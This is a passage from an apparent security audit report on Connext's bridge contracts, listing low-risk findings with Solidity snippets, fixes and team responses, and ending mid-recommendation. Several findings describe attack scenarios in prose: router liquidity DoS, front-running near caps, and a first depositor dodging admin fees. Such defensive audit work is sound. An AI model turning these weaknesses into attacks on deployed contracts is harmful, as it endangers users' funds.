+5.3.19 Fee on transfer tokens can get the transaction stuck Severity: Low Risk Context: AssetLogic.sol#L79 Description: Consider the following scenario. 1. Assume a user has made an xcall with amount A of token X and calldata C1. Since there was no fee while transferring funds, the transfer was a success. 2. Now, before this amount can be transferred on the destination domain, token X introduces a fee on transfer. 3. A relayer now executes this transaction on the destination domain via the _handleExecuteTransaction function on BridgeFacet.sol#L756.
4. This transfers the amount A of token X to the destination domain, but since the fee on this token has now been introduced, the destination domain receives amount A - delta. 5. The calldata is called on the destination domain, but the amount passed is A instead of A - delta; so if the IXReceiver has an amount check, it will fail, because it will expect amount A when it really got amount A - delta. Recommendation: Documentation should be updated in order to guide users about such scenarios so that they can design their IXReceiver contracts accordingly (handling calldata failures gracefully). Connext: The only way a token can get used in the protocol is if it goes through the approval process. Vetting of tokens for use cross-chain will be done responsibly to ensure we aren't using fee-on-transfer tokens, since they aren't compatible with the protocol anyway: AssetLogic.sol#L55 If a token is upgradeable, and it upgrades its contracts to add the fee-on-transfer functionality, such an upgrade would break the flow at the step in the line above. For now, if the token is upgradeable, it will need to be carefully monitored by admins to handle unapproving the asset if it becomes a fee-on-transfer token. Spearbit: Acknowledged.
+5.3.20 Initial Liquidity Provider can trick the system Severity: Low Risk Context: SwapUtils.sol#L923-L924 Description: Since there is no cap on the amount which the initial depositor can deposit, an attacker can trick the system into bypassing admin fees for other users by selling liquidity at half the admin fees. Consider the following scenario. 1. User A provides the first liquidity, of a huge amount. 2. Since there aren't any fees on initial liquidity, admin fees are not collected from User A. 3. Now User A can sell their liquidity to other users at half the admin fees. 4. Other users can mint larger liquidity due to lower fees, and User A also gets the benefit of adminFees/2. Recommendation: Add a cap up to which admin fees are waived for the initial depositor. Once the cap is breached, the user will need to pay the admin fees. Connext: The initial depositor will be the owner or a verified account. Protection from a malicious admin is not worth implementing. At this point there are a myriad of ways malicious admins could take advantage of users, and this adds some extra complexity to address an edge case that is relatively unlikely. Spearbit: Acknowledged.
+5.3.21 Ensure non-zero local asset in _xcall() Severity: Low Risk Context: BridgeFacet.sol#L481 Description: The local asset fetched in _xcall() is not verified to be a non-zero address. In case token mappings are not updated correctly, and to future-proof against later changes, it's better to revert if a zero-address local asset is fetched. local = _getLocalAsset(key, canonical.id, canonical.domain); Recommendation: Consider reverting if local == address(0). Connext: Solved in PR 2471. Spearbit: Verified.
+5.3.22 Use ExcessivelySafeCall to call xReceive() Severity: Low Risk Context: BridgeFacet.sol#L828 Description: For reconciled transfers, ExcessivelySafeCall.excessivelySafeCall() is used to call xReceive(). This is done to avoid copying a large amount of return data into memory. The same attack vector exists for non-reconciled transfers; however, in that case a usual function call is made to xReceive(). In case non-reconciled calls fail due to this error, they can always be retried after reconciliation. Recommendation: Consider replacing the direct function call to xReceive() with excessivelySafeCall().
Store the success of the call in success and revert if it is false. Connext: Solved in PR 2470. Spearbit: Verified.
+5.3.23 A router's liquidity might get trapped if the router is removed Severity: Low Risk Context: • RoutersFacet.sol#L297 • RoutersFacet.sol#L518 • RoutersFacet.sol#L498 • RoutersFacet.sol#L581 Description: If the owner or a user with the Role.Router role removes a router that does not implement calling removeRouterLiquidity or removeRouterLiquidityFor, then any liquidity remaining in the contract for the removed router cannot be transferred back to the router. Recommendation: To be able to remove the router's liquidity, the owner or a user with the Role.Router role needs to add the router back by calling setupRouter and make sure the owner parameter provided to setupRouter is not address(0). Then the router's owner would need to call removeRouterLiquidity for this router. Then the owner or a user with the Role.Router role of this Connext instance can remove the router again. A workaround would be that, when removing a router, it would instead be marked as removed without clearing the router's owner. Then, even after marking it as removed, the router's owner can call removeRouterLiquidityFor. Connext: Solved in PR 2413. Spearbit: Verified.
+5.3.24 In-flight transfers by the relayer can be reverted when setMaxRoutersPerTransfer is called beforehand with a lower number Severity: Low Risk Context: • RoutersFacet.sol#L338 • BridgeFacet.sol#L586 Description: For in-flight transfers where an approved sequencer has picked and signed a number x of routers for a transfer, between the time a relayer or another third party grabs this ExecuteArgs _args and the time this party submits it to the destination domain by calling execute on a Connext instance, the owner or an admin can call setMaxRoutersPerTransfer with a number lower than x, on purpose or not. This would cause the call to execute to revert with BridgeFacet__execute_maxRoutersExceeded. Recommendation: If this act is malicious, for example a malicious admin doing this for a while to DoS the execute endpoint for fast-liquidity routes, the owner would need to detect and remove the said admin. A solution to prevent this type of DoS or accidental act could be adding delays between consecutive calls to setMaxRoutersPerTransfer, for admins only. Maybe the owner should be able to bypass this delay, since if we can't trust the owner there are more serious things we should be worried about. The delay range between when a sequencer has the _args ready and the time a relayer calls execute should be measured and documented for the involved parties. Connext: Likely the max routers per transfer will be controlled by a DAO entity in the future, meaning the configuration changes will be subject to a wait period and can be anticipated. A failed execute would revert fairly early and likely could grief very little ETH from the relayer. The sequencer can just re-auction the transfer after the failed execute in short order. Spearbit: Acknowledged.
+5.3.25 All the privileged users that can call withdrawSwapAdminFees would need to trust each other Severity: Low Risk Context: SwapAdminFacet.sol#L183 Description: The owner needs to trust all the admins, and all admins need to trust each other, since any admin can call the withdrawSwapAdminFees endpoint to withdraw all of a pool's admin fees into their own account. Recommendation: There is no accounting per admin, and all admin fees are pooled into the same place.
We need to make sure they are all aware of this. Also document how the admins are picked and how trust is established between them and the owner. To avoid this issue, Connext could also implement a governance voting structure where admins would vote on how the funds are distributed. Connext: It is safe to assume that all admins are trusted as much as the owner in their on-chain privileges for the time being (this will change under DAO management, of course). Minus upgrading, withdrawing these fees is one of several ways the owner trusts admins not to be malicious. Others include updating fees, setting the relayer vault to a different address, removing assets, etc. Spearbit: Acknowledged.
+5.3.26 The supplied _a to initializeSwap cannot be directly updated but only ramped Severity: Low Risk Context: • SwapAdminFacet.sol#L109-L119 • SwapAdminFacet.sol#L216 Description: Once a swap is initialized by the owner or an admin (indexed by the key parameter), the supplied _a (the scaled amplification coefficient, A * n ** (n - 1)) to initializeSwap cannot be directly updated but only ramped. The owner or the admin can still call rampA to update _a, but it will take some time for it to reach the desired value. This is mostly important if, by mistake, an incorrect value for _a is provided to initializeSwap. Recommendation: We need to make sure this is documented and that users/devs/routers are all aware of this issue. Connext: Documented in PR 2469. Spearbit: Verified.
+5.3.27 Inconsistent behavior when xcall with a non-existent _params.to Severity: Low Risk Context: BridgeFacet.sol#L802 Description: An xcall with a non-existent _params.to behaves differently depending on the path taken. 1. Fast Liquidity Path - Uses IXReceiver(_params.to).xReceive. The _executeCalldata function will revert if _params.to is non-existent, which technically means that the execution has failed. 2. Slow Path - Uses ExcessivelySafeCall.excessivelySafeCall. This function uses the low-level call, which will not revert and will return true if _params.to is non-existent. The _executeCalldata function will return with success set to true, which means the execution has succeeded. Recommendation: For consistency, if _params.to points to a non-existent contract in the Slow Path, skip the ExcessivelySafeCall.excessivelySafeCall call, return, and set success to false. Connext: If the call's params.to is empty (meaning address(0)), then the xcall will revert: BridgeFacet.sol#L454 If the execute receives an empty to, then we can assume the execution is invalid. An invalid execution (via the fast path) can only result in a loss of funds for those involved, since there is no hope of reimbursement. An invalid execution on the slow path can only mean that fraud was committed (there was no corresponding xcall on the sending chain); concerns around that kind of invalid execution should be directed to the security model for the messaging layer. Spearbit: Acknowledged.
+5.3.28 The lpToken cloned in initializeSwap cannot be updated Severity: Low Risk Context: • SwapAdminFacet.sol#L109-L119 • SwapAdminFacet.sol#L157 Description: Once a swap is initialized by the owner or an admin (indexed by the key parameter), an LPToken lpToken is created by cloning the lpTokenTargetAddress provided to the initializeSwap endpoint. There is no restriction on lpTokenTargetAddress except that it needs to be LPToken-like, but it can be malicious under the hood or have security vulnerabilities, so it cannot be trusted.
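One way to realize the "known implementation" alternative mentioned in the recommendation that follows - a minimal sketch, assuming OpenZeppelin's Clones library and a hypothetical LP_TOKEN_IMPLEMENTATION fixed at construction:

    import {Clones} from "@openzeppelin/contracts/proxy/Clones.sol";

    contract SwapAdminSketch {
        // a single audited implementation, fixed at deployment, replaces the
        // caller-supplied lpTokenTargetAddress
        address public immutable LP_TOKEN_IMPLEMENTATION;

        constructor(address _lpTokenImplementation) {
            LP_TOKEN_IMPLEMENTATION = _lpTokenImplementation;
        }

        function _deployLpToken() internal returns (address lpToken) {
            // every pool's LP token now shares one known, audited implementation
            lpToken = Clones.clone(LP_TOKEN_IMPLEMENTATION);
        }
    }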
Recommendation: The procedure for picking and submitting the lpTokenTargetAddress to initializeSwap needs to be thorough and documented. Also, one can avoid cloning lpTokenTargetAddress and instead create the LPToken from a known implementation in the codebase that has been audited. Connext: Some checks have been added. It does still allow admins to supply malicious values, but it would be much more easily detectable (as it wouldn't have to be checked against previously used values; you could simply search for the update event). Solved in PR 2389. Spearbit: Verified.
+5.3.29 Lack of zero check Severity: Low Risk Context: BridgeFacet.sol#L216, BridgeFacet.sol#L247, TokenFacet.sol#L272 Description: Consider the following scenarios. • Instance 1 - BridgeFacet.addSequencer The addSequencer function of BridgeFacet.sol does not check that the sequencer address is not zero before adding it. function addSequencer(address _sequencer) external onlyOwnerOrAdmin { if (s.approvedSequencers[_sequencer]) revert BridgeFacet__addSequencer_alreadyApproved(); s.approvedSequencers[_sequencer] = true; emit SequencerAdded(_sequencer, msg.sender); } If there is a mistake during initialization or an upgrade that sets s.approvedSequencers[0] = true, anyone might be able to craft a payload to execute on the bridge, because the attacker can bypass the following validation within the execute function. if (!s.approvedSequencers[_args.sequencer]) { revert BridgeFacet__execute_notSupportedSequencer(); } • Instance 2 - BridgeFacet.enrollRemoteRouter The enrollRemoteRouter function of BridgeFacet.sol does not check that the domain or router address is not zero before adding them. function enrollRemoteRouter(uint32 _domain, bytes32 _router) external onlyOwnerOrAdmin { // Make sure we aren't setting the current domain as the connextion. if (_domain == s.domain) { revert BridgeFacet__addRemote_invalidDomain(); } s.remotes[_domain] = _router; emit RemoteAdded(_domain, TypeCasts.bytes32ToAddress(_router), msg.sender); } • Instance 3 - TokenFacet._enrollAdoptedAndLocalAssets The _enrollAdoptedAndLocalAssets function of TokenFacet.sol does not check that _canonical.domain and _canonical.id are not zero before adding them. function _enrollAdoptedAndLocalAssets( address _adopted, address _local, address _stableSwapPool, TokenId calldata _canonical ) internal returns (bytes32 _key) { // Get the key _key = AssetLogic.calculateCanonicalHash(_canonical.id, _canonical.domain); // Get true adopted address adopted = _adopted == address(0) ? _local : _adopted; // Sanity check: needs approval if (s.approvedAssets[_key]) revert TokenFacet__addAssetId_alreadyAdded(); // Update approved assets mapping s.approvedAssets[_key] = true; // Update the adopted mapping using convention of local == adopted iff (_adooted == address(0)) s.adoptedToCanonical[adopted].domain = _canonical.domain; s.adoptedToCanonical[adopted].id = _canonical.id; These two values are used for generating the key to determine if a particular asset has been approved. Additionally, a zero value is treated as a null check within the AssetLogic.getCanonicalTokenId function: // Check to see if candidate is an adopted asset. _canonical = s.adoptedToCanonical[_candidate]; if (_canonical.domain != 0) { // Candidate is an adopted asset, return canonical info. return _canonical; } Recommendation: Check that the sequencer address is not zero before adding it. function addSequencer(address _sequencer) external onlyOwnerOrAdmin { + require(_sequencer != address(0), "sequencer with zero address"); if (s.approvedSequencers[_sequencer]) revert BridgeFacet__addSequencer_alreadyApproved(); s.approvedSequencers[_sequencer] = true; emit SequencerAdded(_sequencer, msg.sender); } Check that the domain and router address are not zero before adding them. function enrollRemoteRouter(uint32 _domain, bytes32 _router) external onlyOwnerOrAdmin { + require(_domain != 0, "zero domain"); + require(_router != 0, "router with zero address"); // Make sure we aren't setting the current domain as the connextion. if (_domain == s.domain) { revert BridgeFacet__addRemote_invalidDomain(); } s.remotes[_domain] = _router; emit RemoteAdded(_domain, TypeCasts.bytes32ToAddress(_router), msg.sender); } Check that _canonical.domain and _canonical.id are not zero before adding them. function _enrollAdoptedAndLocalAssets( address _adopted, address _local, address _stableSwapPool, TokenId calldata _canonical ) internal returns (bytes32 _key) { + require(_canonical.domain != 0, "_canonical.domain is zero"); + require(_canonical.id != 0, "_canonical.id is zero"); // Get the key _key = AssetLogic.calculateCanonicalHash(_canonical.id, _canonical.domain); // Get true adopted address adopted = _adopted == address(0) ? _local : _adopted; // Sanity check: needs approval if (s.approvedAssets[_key]) revert TokenFacet__addAssetId_alreadyAdded(); // Update approved assets mapping s.approvedAssets[_key] = true; // Update the adopted mapping using convention of local == adopted iff (_adooted == address(0)) s.adoptedToCanonical[adopted].domain = _canonical.domain; s.adoptedToCanonical[adopted].id = _canonical.id; Connext: Solved in PR 2297. Spearbit: Verified.
+5.3.30 When initializing Connext bridge make sure _xAppConnectionManager domain matches the one provided to the initialization function for the bridge Severity: Low Risk Context: • DiamondInit.sol#L59 • DiamondInit.sol#L62 • SpokeConnector.sol#L250-L252 • SpokeConnector.sol#L282-L296 • BridgeFacet.sol#L238-L240 Description: The only contract that fully implements IConnectorManager is SpokeConnector (through inheriting ConnectorManager and overriding localDomain): // File: SpokeConnector.sol function localDomain() external view override returns (uint32) { return DOMAIN; } So a SpokeConnector or an IConnectorManager has its own concept of the local domain (the domain that it lives on / is deployed on). And this domain is used when we are hashing messages and inserting them into the SpokeConnector's merkle tree: // File: SpokeConnector.sol bytes memory _message = Message.formatMessage( DOMAIN, bytes32(uint256(uint160(msg.sender))), _nonce, _destinationDomain, _recipientAddress, _messageBody ); // Insert the hashed message into the Merkle tree. bytes32 _messageHash = keccak256(_message); // Returns the root calculated after insertion of message, needed for events for // watchers (bytes32 _root, uint256 _count) = MERKLE.insert(_messageHash); We need to make sure that this local domain matches the _domain provided to this init function. Otherwise, the message hashes that are inserted into SpokeConnector's merkle tree would have 2 different origin domains linked to them: one from the SpokeConnector in this message hash, and one from Connext's s.domain = _domain, which is used in calculating the transfer id hash. The same issue applies to setXAppConnectionManager. Recommendation: We suggest comparing these 2 domains to avoid potential pitfalls for cross-chain transfers. // File: DiamondInit.sol error DiamondInit__init_domainsDontMatch(); ... // Connext s.LIQUIDITY_FEE_NUMERATOR = 9995; s.maxRoutersPerTransfer = 5; if (_domain != IConnectorManager(_xAppConnectionManager).localDomain()) { revert DiamondInit__init_domainsDontMatch(); } s.domain = _domain; s.xAppConnectionManager = IConnectorManager(_xAppConnectionManager); The same check can be applied to setXAppConnectionManager: // File: BridgeFacet.sol function setXAppConnectionManager(address _xAppConnectionManager) external onlyOwnerOrAdmin { if (s.domain != IConnectorManager(_xAppConnectionManager).localDomain()) { revert DiamondInit__init_domainsDontMatch(); } s.xAppConnectionManager = IConnectorManager(_xAppConnectionManager); } Connext: Solved in PR 2465. Spearbit: Verified.
+5.3.31 The stable swap pools used in Connext are incompatible with tokens with varying decimals Severity: Low Risk Context: • TokenFacet.sol#L164 • TokenFacet.sol#L399 • SwapAdminFacet.sol#L140 • SwapAdminFacet.sol#L143 • SwapAdminFacet.sol#L169 • StableSwap.sol#L100 • SwapUtilsExternal.sol#L407 • SwapUtils.sol#L370 Description: The stable swap functionality used in Connext calculates and stores, for each token in a pool, the token's precision relative to the pool's precision. The token precision calculation uses the token's decimals. And since this precision is only set once, for a token that can have its decimals changed at a later time in the future, the precision used might not always be accurate. So, in the event of a token decimal change, the swap calculations involving this token would be inaccurate. For example in _xp(...): function _xp(uint256[] memory balances, uint256[] memory precisionMultipliers) internal pure returns (uint256[] memory) { uint256 numTokens = balances.length; require(numTokens == precisionMultipliers.length, "mismatch multipliers"); uint256[] memory xp = new uint256[](numTokens); for (uint256 i; i < numTokens; ) { xp[i] = balances[i] * precisionMultipliers[i]; unchecked { ++i; } } return xp; } We are multiplying in xp[i] = balances[i] * precisionMultipliers[i]; and cannot use division for tokens that have a higher precision than the pool's default precision. Recommendation: Document the procedure of what tokens are allowed to be included in stable swap pools and what actions Connext would take when a decimal change happens. Leave a comment for users/devs on whether only fixed-decimal tokens are allowed in the protocol. Connext: The intention with the current construction is to manually update assets whose decimals change (by removing them and setting them up again). Added a comment for devs in PR 2453. Spearbit: This issue needs off-chain monitoring and enforcement. The Connext team would need to monitor all tokens used in the protocol for this issue.
+5.3.32 When Connext reaches the allowed custodied cap, race conditions can be created Severity: Low Risk Context: • BridgeFacet.sol#L489-L497 • RoutersFacet.sol#L554-L561 Description: When IERC20(local).balanceOf(address(this)) is close to s.caps[key] (this can be relative/subjective) for a canonical token on its canonical domain, a race condition is created where users might try to frontrun each other's calls to xcall or xcallIntoLocal to be included in a cross-chain transfer. This race condition is actually between all users and all liquidity routers, since there is the same type of check when routers try to add liquidity:
Recommendation: Consider implementing off-chain components that automatically rebalance the assets by de- ploying them elsewhere if a certain asset on the bridge is reaching the liquidity cap. However, this might need to be done carefully, otherwise, some tokens cannot bridge back. Alternatively, prepare a continuity plan to deal with this issue manually (e.g. methods for reducing the liquidity on the bridge) if it happens. Connext: Introducing transfers to rebalance the network is something we are familiar with how to do manually, as it is a requirement of our current system as well so that is the approach we will take. These conditions are introduced by the nature of a cap, but limiting the amount at stake while the protocol is new is higher priority to us. Spearbit: Acknowledged. +5.3.35 calculateTokenAmount is not checking whether amounts provided has the same length as balances Severity: Low Risk Context: • SwapUtils.sol#L636-L645 • StableSwap.sol#L280 • StableSwapFacet.sol#L167 Description: There is no check to make sure amounts.length == balances.length in calculateTokenAmount: function calculateTokenAmount( Swap storage self, uint256[] calldata amounts, bool deposit ) internal view returns (uint256) { uint256 a = _getAPrecise(self); uint256[] memory balances = self.balances; ... There are 2 bad cases: 49 1. amounts.length > balances.length, in this case, we have provided extra data which will be ignored silently and might cause miscalculation on or off chain. 2. amounts.length < balances.length, the loop in calculateTokenAmount would/should revert becasue of an index-out-of-bound error. In this case, we might spend more gas than necessary compared to if we had performed the check and reverted early. Recommendation: Check for amounts.length == balances.length and thus avoid the pitfalls mentioned above. function calculateTokenAmount( Swap storage self, uint256[] calldata amounts, bool deposit ) internal view returns (uint256) { uint256[] memory balances = self.balances; uint256 numBalances = balances.length; if(amounts.length != numBalances) { revert SomeCustomError(); // <-- this error needs to be defined } ... Connext: Solved in PR 2388. Spearbit: Verified. +5.3.36 Rearrange an expression in _calculateSwapInv to avoid underflows Severity: Low Risk Context: SwapUtils.sol#L581 Description: In the following expression used in SwapUtils_calculateSwapInv, if xp[tokenIndexFrom] = x + 1 the expression would underflow and revert. We can arrange the expression to avoid reverting in this edge case. dx = x - xp[tokenIndexFrom] + 1; Recommendation: If the following rearrangement is used, the edge case discussed would not revert. dx = (x + 1) - xp[tokenIndexFrom]; Note: We need to check whether the ranges of asset balances can be high such that x+1 would overflow. Connext: Solved in PR 2382. Spearbit: Verified. +5.3.37 The pre-image of DIAMOND_STORAGE_POSITION's storage slot is known Severity: Low Risk Context: LibDiamond.sol#L14 Description: The preimage of the hashed storage slot DIAMOND_STORAGE_POSITION is known. Recommendation: It might be best to subtract 1 so that the preimage would not be easily attainable. As an example, this is the technique that OpenZeppelin uses. Connext: Solved by PR 2224. Spearbit: Verified. 
50 +5.3.38 The @param NatSpec comment for _key in AssetLogic._swapAsset is incorrect Severity: Low Risk Context: AssetLogic.sol#L221 Description: The @param NatSpec for _key indicates that this parameter is a canonical token id where instead it should mention that it is a hash of a canonical id and its corresponding domain. We need to make sure the correct value has been passed down to _swapAsset. Recommendation: Change the NatSpec to: - * @param _key - The canonical token id + * @param _key - Hash of a canonical id and its corresponding domain Connext: Solved in PR 2457. Spearbit: Verified. +5.3.39 Malicious routers can temporarily DOS the bridge by depositing a large amount of liquidity Severity: Low Risk Context: BridgeFacet.sol#L489-L497 Description: Both router and bridge share the same liquidity cap on the Connext bridge. Assume that the liquidity cap for USDC is 1 million on Ethereum. Shortly after the Connext Amarok launch, a router adds 1 million USDC liquidity. No one would be able to perform a xcall transfer with USDC from Ethereum to other chains as it will always revert because the liquidity cap has exceeded. The DOS is temporary because the router's liquidity on Ethereum will be reduced if there is USDC liquidity flowing in the opposite direction (e.g., From Polygon to Ethereum) Recommendation: Consider having a separate liquidity cap for the router and bridge. Connext: The routers were removed from tracking towards the cap. The cap will track funds moving through the bridge, and that will impact AMM prices, which will impact slippage, which should naturally tamp demand for routers to provide mainnet exit liquidity. Since capping only value through the bridge seems to have network-wide impacts, we decided to only count those funds towards the cap. Spearbit: Verified. +5.3.40 Prevent deploying a representation token twice Severity: Low Risk Context: TokenFacet.sol#L164-L190, TokenFacet.sol#L272-L313, TokenFacet.sol#L354-L383 Description: The function setupAsset() is protected by _enrollAdoptedAndLocalAssets() which checks s.approvedAssets[_key] to prevent accidentally setting up an asset twice. However the function _removeAssetId() is rather thorough and removes the s.approvedAssets[_key] flag. After a call to _removeAssetId(), an asset can be recreated via setupAsset(). This will deploy a second representation token which will be confusing to users of Connext. Note: The function setupAssetWithDeployedRepresentation() could be used to connect a previous presentation token again to the canonical token. Note: All these functions are authorized so it would only be a problem if mistakes are made. 51 function setupAsset(...) ... onlyOwnerOrAdmin ... { if (_canonical.domain != s.domain) { _local = _deployRepresentation(...); // deploys a new token } else { ... } bytes32 key = _enrollAdoptedAndLocalAssets(_adoptedAssetId, _local, _stableSwapPool, _canonical); ... } function _enrollAdoptedAndLocalAssets(...) ... { ... if (s.approvedAssets[_key]) revert TokenFacet__addAssetId_alreadyAdded(); s.approvedAssets[_key] = true; ... } function _removeAssetId(...) ... { ... delete s.approvedAssets[_key]; ... } Recommendation: Consider checking that a token has previously been deployed. Probably a separate mapping is required to store previously deployed contracts. Connext: Solved in PR 2462. 
+5.3.41 Extra safety checks in _removeAssetId()
Severity: Low Risk
Context: TokenFacet.sol#L354-L383
Description: The function _removeAssetId() deletes assets, but it doesn't check whether the passed parameters are a consistent set. This allows for mistakes where the wrong values are accidentally deleted.

function _removeAssetId(bytes32 _key, address _adoptedAssetId, address _representation) internal {
    ...
    delete s.adoptedToCanonical[_adoptedAssetId];
    delete s.representationToCanonical[_representation];
    ...
}

Recommendation: Consider adding the following checks at the beginning of function _removeAssetId():

if (s.adoptedToCanonical[_adoptedAssetId] != key) revert ....
if (s.representationToCanonical[_representation] != key) revert ...

Connext: Solved in PR 2454.
Spearbit: Verified.

+5.3.42 Data length not validated
Severity: Low Risk
Context: GnosisSpokeConnector.sol#L54-L61, BaseMultichain.sol#L39-L47, OptimismSpokeConnector.sol#L51-L54
Description: The following functions do not validate that the input _data is 32 bytes.
• GnosisSpokeConnector._sendMessage
• GnosisSpokeConnector._processMessage
• BaseMultichain.sendMessage
• OptimismSpokeConnector._sendMessage
The input _data contains the outbound Merkle root or aggregated Merkle root, which is always 32 bytes. If the root is not 32 bytes, it is invalid and should be rejected.
Recommendation: Validate the input _data to ensure that it is 32 bytes.

GnosisSpokeConnector._sendMessage

function _sendMessage(bytes memory _data) internal override {
+   require(_data.length == 32, "!length");
    // send the message to the l1 connector by calling `processMessage`
    GnosisAmb(AMB).requireToPassMessage(
        mirrorConnector,
        abi.encodeWithSelector(Connector.processMessage.selector, _data),
        mirrorGas
    );
}

GnosisSpokeConnector._processMessage

function _processMessage(bytes memory _data) internal override {
+   require(_data.length == 32, "!length");
    // ensure the l1 connector sent the message
    require(_verifySender(mirrorConnector), "!mirrorConnector");
    // ensure it is headed to this domain
    require(GnosisAmb(AMB).destinationChainId() == block.chainid, "!destinationChain");
    // update the aggregate root on the domain
    receiveAggregateRoot(bytes32(_data));
}

BaseMultichain.sendMessage

function _sendMessage(address _amb, bytes memory _data) internal {
+   require(_data.length == 32, "!length");
    Multichain(_amb).anyCall(
        _amb, // Same address on every chain, using AMB as it is immutable
        _data,
        address(0), // fallback address on origin chain
        MIRROR_CHAIN_ID,
        0 // fee paid on origin chain
    );
}

OptimismSpokeConnector._sendMessage

function _sendMessage(bytes memory _data) internal override {
+   require(_data.length == 32, "!length");
    bytes memory _calldata = abi.encodeWithSelector(Connector.processMessage.selector, _data);
    OptimismAmb(AMB).sendMessage(mirrorConnector, _calldata, uint32(mirrorGas));
}

Connext: Solved in PR 2452.
Spearbit: Verified.
+5.3.43 Verify timestamp reliability on L2
Severity: Low Risk
Context: StableSwap.sol#L136, ProposedOwnableFacet.sol, RoutersFacet.sol#L442, StableSwapFacet.sol#L46, SwapUtilsExternal.sol, ProposedOwnableFacet.sol#L263, AmplificationUtils.sol
Description: Timestamp information on rollups can be less reliable than on mainnet. For instance, the Arbitrum docs say:
As a general rule, any timing assumptions a contract makes about block numbers and timestamps should be considered generally reliable in the longer term (i.e., on the order of at least several hours) but unreliable in the shorter term (minutes). (It so happens these are generally the same assumptions one should operate under when using block numbers directly on Ethereum!)
The Uniswap docs mention this for Optimism:
The block.timestamp of these blocks, however, reflect the block.timestamp of the last L1 block ingested by the Sequencer.
Recommendation: Before deploying on a rollup, consider checking its documentation on timestamps and verify that the time-dependent functionality is safe. It can be the case that the deviation is small enough not to matter; if the deviation is large, increase the deadline threshold.
Connext: Acknowledged.
Spearbit: Acknowledged.

+5.3.44 MirrorConnector cannot be changed once set
Severity: Low Risk
Context: PolygonHubConnector.sol#L51-L55, PolygonSpokeConnector.sol#L78-L82
Description: For chains other than Polygon, it is allowed to change the mirror connector any number of times. For the Polygon chain, _setMirrorConnector is overridden.
1. Let's take the PolygonHubConnector contract as an example:

function _setMirrorConnector(address _mirrorConnector) internal override {
    super._setMirrorConnector(_mirrorConnector);
    setFxChildTunnel(_mirrorConnector);
}

2. Since setFxChildTunnel (PolygonHubConnector) can only be called once due to the require check below, this also restricts the number of times the mirror connector can be altered.

function setFxChildTunnel(address _fxChildTunnel) public virtual {
    require(fxChildTunnel == address(0x0), "FxBaseRootTunnel: CHILD_TUNNEL_ALREADY_SET");
    ...
}

Recommendation: If it is required to allow changing the mirror connector, remove the require condition in both setFxChildTunnel (PolygonHubConnector) and setFxRootTunnel (PolygonSpokeConnector).
Connext: Fixed in PRs 2546 & 2520.
Spearbit: Verified.
+5.3.45 Possible infinite loop in dequeueVerified()
Severity: Low Risk
Context: Queue.sol#L59-L102
Description: The loop in function dequeueVerified() doesn't end if queue.first == queue.last == 0. In this situation, at unchecked { --last; } the following happens: last wraps to type(uint128).max. Now last is very large and is surely >= first, and thus the loop keeps running. This problem can occur when the queue isn't initialized.

function dequeueVerified(Queue storage queue, uint256 delay) internal returns (bytes32[] memory) {
    uint128 first = queue.first;
    uint128 last = queue.last;
    require(last >= first, "queue empty");
    for (last; last >= first; ) {
        ...
        unchecked {
            --last; // underflows when last == 0 (e.g. queue isn't initialized)
        }
    }
}

Recommendation: Document the risk of an infinite loop and the importance of initializing the queue. Or do one of the following (a sketch of the first option appears at the end of this section):
• Check that the queue is initialized (e.g. queue.first >= 1, as last >= first is already checked).
• Remove unchecked.
• Change the type of last to a signed type such as int256; this way it is no problem if it's negative.
Connext: Solved in PR 2384.
Spearbit: Verified.

+5.3.46 Do not ignore staticcall's return value
Severity: Low Risk
Context: TypedMemView.sol#L652, TypedMemView.sol#L761, TypedMemView.sol#L668-L669, TypedMemView.sol#L685-L686
Description: TypedMemView calls several precompiles through the staticcall opcode and never checks its return value, assuming success. For instance:

// use the identity precompile to copy
// guaranteed not to fail, so pop the success
pop(staticcall(gas(), 4, _oldLoc, _len, _newLoc, _len))

However, there are rare cases when a call to a precompile can fail, for example when the call runs out of gas (since 63/64 of the gas is passed, the remaining execution can still have gas). Generally, not checking calls for success is dangerous and can have unintended consequences.
Recommendation: staticcall returns 1 on success and 0 on failure. Consider reverting if it returns 0. See summa-tx/memview-sol/pull/9 for a solution.
Connext: Solved in PR 2451.
Spearbit: Verified.

+5.3.47 Renounce wait time can be extended
Severity: Low Risk
Context: ProposedOwnable.sol#L109-L118
Description: The _proposedOwnershipTimestamp is updated every time proposeNewOwner is called with newlyProposed as the zero address. This extends the time before ownership can be renounced.
Recommendation: Add a check which rejects duplicate owner-renounce requests.

if (_proposed == newlyProposed && newlyProposed == address(0) && _proposedOwnershipTimestamp != 0) {
    revert ProposedOwnable__proposeNewOwner_invalidProposal();
}

Connext: Solved in PR 2450.
Spearbit: Verified.

+5.3.48 Extra parameter in function checker() at encodeWithSelector()
Severity: Low Risk
Context: SendOutboundRootResolver.sol#L32-L42
Description: The function checker() sets up the parameters to call the function sendMessage(). However, it adds an extra parameter outboundRoot, which isn't necessary.

function sendMessage() external { ... }

function checker() external view override returns (bool canExec, bytes memory execPayload) {
    ...
    execPayload = abi.encodeWithSelector(this.sendMessage.selector, outboundRoot); // extra parameter
    ...
}

Recommendation: Remove outboundRoot and preferably use abi.encodeCall(...), which explicitly checks the provided parameters against the function definition.

- execPayload = abi.encodeWithSelector(this.sendMessage.selector, outboundRoot);
+ execPayload = abi.encodeCall(this.sendMessage, ());

Connext: SendOutboundRootResolver.sol is removed in PR 2199.
Spearbit: Verified.
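As referenced in 5.3.45, a minimal sketch of the first option (the Queue layout follows the finding; the verification logic is elided and the placeholder return is ours):

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

library QueueSketch {
    struct Queue {
        uint128 first; // initialize to 1 on setup
        uint128 last;
        mapping(uint256 => bytes32) data;
    }

    function dequeueVerified(Queue storage queue, uint256 delay) internal returns (bytes32[] memory) {
        uint128 first = queue.first;
        uint128 last = queue.last;
        // With first >= 1 (and last >= first checked below), `--last` can never
        // wrap: the loop exits once last reaches first - 1 >= 0.
        require(first >= 1, "queue uninitialized");
        require(last >= first, "queue empty");
        for (last; last >= first; ) {
            // verification of queue.data[last] against `delay` elided in this sketch
            unchecked {
                --last;
            }
        }
        return new bytes32[](0); // placeholder; the real function returns the dequeued items
    }
}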
5.4 Gas Optimization

+5.4.1 MerkleLib.insert() can be optimized
Severity: Gas Optimization
Context: Merkle.sol#L76-L105, Merkle.sol#L115
Description: MerkleTreeManager.insert() calls MerkleLib.insert() repeatedly on a tree stored in storage. Each call to MerkleLib.insert() reads the entire tree from storage and writes 2 values (tree.count and tree.branch[i]) back to storage. These storage operations can be done only once, by loading the tree into memory at the beginning. The updated count and branches can be written back to storage at the end, saving expensive SSTORE and SLOAD operations.
Recommendation: Consider the following (a sketch of this flow appears after 5.4.4 below):
